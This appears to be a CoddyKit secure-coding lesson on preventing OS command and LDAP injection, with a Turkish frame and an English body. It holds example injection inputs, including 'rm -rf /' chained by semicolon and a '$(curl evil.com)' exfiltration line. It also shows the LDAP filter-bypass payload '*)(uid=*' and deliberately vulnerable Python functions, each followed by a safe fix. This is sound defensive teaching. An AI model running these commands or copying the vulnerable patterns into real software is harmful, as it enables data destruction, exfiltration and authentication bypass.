Komut ve LDAP Enjeksiyonunu Önleme
OS komut enjeksiyonunun ve LDAP enjeksiyonunun nasıl çalıştığını, güvenli API'ler, izin listeleri ve doğru kodlamayla bunlara karşı nasıl savunulacağınızı öğrenin.
Komut ve LDAP Enjeksiyonunu Önleme, CoddyKit'te ücretsiz bir Secure Coding & OWASP Top 10 for Backend dersidir. Bu, 4 dersinin 4. dersidir. Aşağıdan dersin tamamını ücretsiz okuyabilir, sonra tarayıcıda yerleşik kod editörü ve 7/24 yapay zeka koçu ile uygulamalı olarak pratik yapabilirsin. Bu, Secure Coding & OWASP Top 10 for Backend öğrenme yolunun bir parçasıdır ve ilerlemeniz web ve CoddyKit uygulaması arasında senkronize olur. Secure Coding & OWASP Top 10 for Backend kursu toplamda 4 dersten oluşur.
Bu dersin bazı bölümleri henüz çevrilmemiş olup İngilizce olarak gösterilmektedir.
Beyond SQL Injection
Injection is not limited to SQL. Any time untrusted input is mixed into a command interpreter, you risk injection. Two dangerous cousins are OS command injection and LDAP injection.
This lesson shows how both work and how to stop them.
How Command Injection Works
Command injection happens when user input is passed to a shell. Shell metacharacters like ;, &&, and | let an attacker append their own commands.
- Input
file.txt; rm -rf /can delete data - Input
$(curl evil.com)can exfiltrate or download
The Vulnerable Pattern
The danger is invoking a shell with a concatenated string. Here the user controls part of the command line.
import os
def ping(host):
# DANGEROUS: host is interpolated into a shell command
os.system('ping -c 1 ' + host)
# ping('8.8.8.8; rm -rf /tmp/data') runs two commandsUse Safe APIs
The fix is to avoid the shell entirely. Pass arguments as a list to an exec-style API so the OS treats input as a single argument, never as syntax.
import subprocess
def ping(host):
# SAFE: no shell, host is a single argument
subprocess.run(['ping', '-c', '1', host], shell=False, check=True)Validate with Allow-Lists
When input feeds a command, restrict it to a known-good pattern. An allow-list rejects anything outside an expected set instead of trying to block bad characters.
import re
def is_valid_host(host):
pattern = r'^[a-zA-Z0-9.-]{1,253}$'
return re.match(pattern, host) is not None
print(is_valid_host('example.com'))
print(is_valid_host('8.8.8.8; rm -rf /'))Avoid Shell Features
Never enable shell=True, eval, or string-based command builders with untrusted data. If you must use a shell, escape arguments with the platform quoting function, but prefer the no-shell approach.
What Is LDAP Injection?
LDAP injection targets directory queries used in authentication and lookups. Special characters like *, (, ), and \ alter the filter logic.
An input of * in a username field can match every entry, bypassing access checks.
Vulnerable LDAP Filter
Building filters by string concatenation lets attackers rewrite the query.
def build_filter(username):
# DANGEROUS: username can contain LDAP metacharacters
return '(&(uid=' + username + ')(active=TRUE))'
# build_filter('*)(uid=*') opens the filter to all usersEscaping LDAP Input
Escape special characters before inserting them into a filter, per RFC 4515. Most LDAP libraries provide an escape helper, use it for every dynamic value.
def escape_ldap(value):
replacements = {'\\': '\\5c', '*': '\\2a', '(': '\\28', ')': '\\29', '\x00': '\\00'}
out = ''
for ch in value:
out += replacements.get(ch, ch)
return out
print(escape_ldap('*)(uid=*'))Defense in Depth
Combine safe APIs, allow-list validation, and least privilege. Run processes under low-privilege accounts so even a successful injection cannot do much.
- No shell where possible
- Validate every input
- Drop privileges before executing
Testing for Injection
Probe inputs with metacharacters during testing: semicolons and pipes for command fields, asterisks and parentheses for LDAP fields. Automated DAST tools and code review both help catch these flaws early.
Quick Check
Test your understanding of injection defenses.
Recap
You learned how command injection and LDAP injection work and how to stop them: avoid the shell with safe exec APIs, use allow-list validation, escape LDAP special characters, and apply least privilege. Treat every interpreter boundary as a place where injection can occur.
Sıkça Sorulan Sorular
“Komut ve LDAP Enjeksiyonunu Önleme” dersi ücretsiz mi?
Evet — “Komut ve LDAP Enjeksiyonunu Önleme” dersin tüm metni burada web'de ücretsiz olarak okunabilir. Etkileşimli olarak pratik yapmak (yerleşik kod editörü ve 7/24 yapay zeka koçu) ve Secure Coding & OWASP Top 10 for Backend kursunun geri kalanını açmak için CoddyKit PRO'ya yükselt. Secure Coding & OWASP Top 10 for Backend kursu toplamda 4 dersten oluşur.
“Komut ve LDAP Enjeksiyonunu Önleme” dersinde ne öğreneceğim?
OS komut enjeksiyonunun ve LDAP enjeksiyonunun nasıl çalıştığını, güvenli API'ler, izin listeleri ve doğru kodlamayla bunlara karşı nasıl savunulacağınızı öğrenin. Secure Coding & OWASP Top 10 for Backend ile uygulamalı kodu tarayıcıda doğrudan çalıştırarak pratik yaparsın ve 7/24 yapay zeka koçu dersi çalışırken sorularını yanıtlar.
Secure Coding & OWASP Top 10 for Backend öğrenmeye başlamak için deneyim gerekli mi?
Önceden deneyim gerekmez. CoddyKit'te Secure Coding & OWASP Top 10 for Backend, başlangıçtan ileri seviyeye kadar yapılandırıldığı için buradan başlayabilir veya başından başlayıp kendi hızında ilerleme yapabilirsin. Bu, 4 dersinin 4. dersidir.
“Komut ve LDAP Enjeksiyonunu Önleme” dersi ne kadar sürer?
Çoğu CoddyKit dersi yaklaşık 5–10 dakika sürer. Her biri kısa ve etkileşimli olduğu için sabit ilerleme yaparsın ve web ile uygulama arasında tam olarak bıraktığın yerden devam edebilirsin.
Bu Secure Coding & OWASP Top 10 for Backend dersinde kod yazıp çalıştırabilir miyim?
Evet. Her Secure Coding & OWASP Top 10 for Backend dersi yerleşik bir kod editörü içerir, bu sayede tarayıcıda gerçek kod yazıp çalıştırabilir ve anlık yapay zeka geri bildirimi alırsın — yerel kurulum gerekli değildir.
Bu kursun tüm dersleri
- İleri Düzey SQLi ve NoSQLi Teknikleri
- Kapsamlı Girdi Doğrulama Stratejileri
- Arka Uç için İçerik Güvenlik Politikası (CSP)
- Komut ve LDAP Enjeksiyonunu Önleme